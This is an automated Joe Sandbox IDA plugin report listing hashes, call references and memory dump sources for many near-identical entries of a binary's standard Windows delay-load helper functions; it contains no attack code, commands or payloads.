                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 4d2159d976d7746a166088badb76d5bcbcff51b6c0bbccb6e52f34fe403e60bb
                                                                    • Instruction ID: 137d67237371d5f96d3c06241a83a2d6e888544b70bf404d53e78d44d7ed73f4
                                                                    • Opcode Fuzzy Hash: 4d2159d976d7746a166088badb76d5bcbcff51b6c0bbccb6e52f34fe403e60bb
                                                                    • Instruction Fuzzy Hash: F0B0128935C303FD324453485C02DFF060CD1C0B10331C53FF00AC1280D4405C594031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: cb94285b00c50188f6fb79fbfe279636cae2ac77f5c057f2c047f26334247726
                                                                    • Instruction ID: 4ede40f938d568495201bf31cbf75e654e774daea10683b16206fbff8f36ea9d
                                                                    • Opcode Fuzzy Hash: cb94285b00c50188f6fb79fbfe279636cae2ac77f5c057f2c047f26334247726
                                                                    • Instruction Fuzzy Hash: 7BB0128935C303FD310453485C02DFF060CD1C0B10331C43FF40AC1280D4406C090031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: c75513654ead045dfe08e83d2df0e954cf7ee8601ba3f6e92249781b05cd4331
                                                                    • Instruction ID: ec5908779aad165cc595bc0226301a7eebf728722ab170d80801eaea2c7cab02
                                                                    • Opcode Fuzzy Hash: c75513654ead045dfe08e83d2df0e954cf7ee8601ba3f6e92249781b05cd4331
                                                                    • Instruction Fuzzy Hash: 1BB0128536C303FD31045348AC02DFF061CD1D0B10331C53FF00AC1180D4405C0A0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: dbdbe2c42bd816ba271abf5ad26c8f7405eaa58f924c988769bd0c17fe3d1b52
                                                                    • Instruction ID: 1e97a927bf04f5520a787af4b193200cc00eb23ab9707861d43670b23793775b
                                                                    • Opcode Fuzzy Hash: dbdbe2c42bd816ba271abf5ad26c8f7405eaa58f924c988769bd0c17fe3d1b52
                                                                    • Instruction Fuzzy Hash: 54B0128535C207FE321413445C02CFF060CD1C0B10331C53FF006C00C094405C090031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: d67cf1d27b1600b22b291d5ea4f9a21f3f54037aaacca8ad9820d39bedea01a1
                                                                    • Instruction ID: 08254c1928e34fb8180de9ed88494f7a31079767de33317ee6aa3045ec1cdf2d
                                                                    • Opcode Fuzzy Hash: d67cf1d27b1600b22b291d5ea4f9a21f3f54037aaacca8ad9820d39bedea01a1
                                                                    • Instruction Fuzzy Hash: 47B0129535C203FD310453485D02DFF068CC1C0B10331C47FF80AC1180D4405D1A4031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: ea6d88b9c5729fbe3551b2034b53864b37e9524a8413fcd876771e287903637b
                                                                    • Instruction ID: ad888fecaf8c007d4ca2f7cdf1715bdf21b0d1d0d75e82d37d5627651025e9f8
                                                                    • Opcode Fuzzy Hash: ea6d88b9c5729fbe3551b2034b53864b37e9524a8413fcd876771e287903637b
                                                                    • Instruction Fuzzy Hash: 8FB0129535C203FD310453495C02DFF060CD1C0B10331D47FF00AC1180D4405E090031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 6b1f19a9c5948c2253676e1450aa3e0d3df7cef6dd4303645b4225296f04a073
                                                                    • Instruction ID: e56fd88fd933effa18b8ad096f4531ca2c385df93d970e5c57faa175df3424d4
                                                                    • Opcode Fuzzy Hash: 6b1f19a9c5948c2253676e1450aa3e0d3df7cef6dd4303645b4225296f04a073
                                                                    • Instruction Fuzzy Hash: 9FB0129535C203FD310453485D02DFF060CC1C0B10331D47FF40AC1184D4405F1A0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 98244a0eed3582fb4c2cf0062cd2225c7ef7b4b661077a8f4fb6624318ff7ef7
                                                                    • Instruction ID: b19863e90c7f81abd8398406b9c2f69c692fd3e2d8c407c49d7cb94d660722e2
                                                                    • Opcode Fuzzy Hash: 98244a0eed3582fb4c2cf0062cd2225c7ef7b4b661077a8f4fb6624318ff7ef7
                                                                    • Instruction Fuzzy Hash: 8EB0129535D703FD328453485C02DFF060DC1C0B10331C53FF00AC1180D4405C990031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 5ec21216f60dabdefd8f26b9ae830cac3e97293750c83de07e1a4e19028f823e
                                                                    • Instruction ID: 865160b5c5e65c0eb6132da2a3c44bc12de5829c1110a45d0f633b37d4fe9182
                                                                    • Opcode Fuzzy Hash: 5ec21216f60dabdefd8f26b9ae830cac3e97293750c83de07e1a4e19028f823e
                                                                    • Instruction Fuzzy Hash: 44B0129639C105FC310873885C03EFB0A1CE5C0B10330C42EF00AC1281D8405C440171
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 27cdfeb45ec7aa575570cce673b541d1e8f2c375246edd5d7ed0bab50a1b2b49
                                                                    • Instruction ID: d00951d12cc973d5317ea444ec7fa04dd79ed3a1d7f8c06ce738244d9f390e94
                                                                    • Opcode Fuzzy Hash: 27cdfeb45ec7aa575570cce673b541d1e8f2c375246edd5d7ed0bab50a1b2b49
                                                                    • Instruction Fuzzy Hash: 62B0129635C201FC320873885C03DFB0A1CD5C0B10330C52EF00AC12C1D8405C884071
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: d76033b18f0c1f80cba06008cc560b50e72860175156e7623891fcd73c188308
                                                                    • Instruction ID: a33f51efb436cc99003d72ab651ec013a9064fd90e62a35eac2c2cb7e23ed96a
                                                                    • Opcode Fuzzy Hash: d76033b18f0c1f80cba06008cc560b50e72860175156e7623891fcd73c188308
                                                                    • Instruction Fuzzy Hash: 0FB0129636C001FC31087388AC02EFB0A1CD5C0B10330C62FF00AC1181D8405C450075
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: b9870e08a5420682e27fb31a23d6789199b497ba504d5bbcf3532145df281663
                                                                    • Instruction ID: dc75ec4ee926afcb3a36920801457978fa05794eb44ba268033babd875f1af69
                                                                    • Opcode Fuzzy Hash: b9870e08a5420682e27fb31a23d6789199b497ba504d5bbcf3532145df281663
                                                                    • Instruction Fuzzy Hash: 76B012C679C002FC35041348ED02CF7051DCDC0B18330C57EF102D40829C517C050031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 555d2f60da3748f917ca3d20b3940865cc25e81f1971961d3a0d5ce266276d93
                                                                    • Instruction ID: bb500b2c834e9234a5e8a6a081489c254cd9487cd673028e93574a9028aaf6ae
                                                                    • Opcode Fuzzy Hash: 555d2f60da3748f917ca3d20b3940865cc25e81f1971961d3a0d5ce266276d93
                                                                    • Instruction Fuzzy Hash: 4DB012C13DC201FC330453989C12DFB054DD1C0B10330D86EF446C2180D8406C0D0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 1df0c178378b236b979ad4a7fc95f06c6eff41e82406f47275f8435ba6160ca5
                                                                    • Instruction ID: 5e79ce6b28c107797c72ed95bac94a9c2e594d1f1b9584da516ccc19ca4d8e19
                                                                    • Opcode Fuzzy Hash: 1df0c178378b236b979ad4a7fc95f06c6eff41e82406f47275f8435ba6160ca5
                                                                    • Instruction Fuzzy Hash: EFB012C13EC301FC334453989C12DFB054DD1C0B10330D92EF046C1180D8406C4D0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 8c63c3ac906fa1895cf0ad0f09fe2eed0e42a646c66d78947f5e4696b9c0b99e
                                                                    • Instruction ID: 6df164a224f90d06abc0bcb608580433ea9286b506193127e9bf0e9e60fb6368
                                                                    • Opcode Fuzzy Hash: 8c63c3ac906fa1895cf0ad0f09fe2eed0e42a646c66d78947f5e4696b9c0b99e
                                                                    • Instruction Fuzzy Hash: 13B012C13DC201EC32045398DD12DFB055DD1C0B14330D87EF446C1180D8416C0F4031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
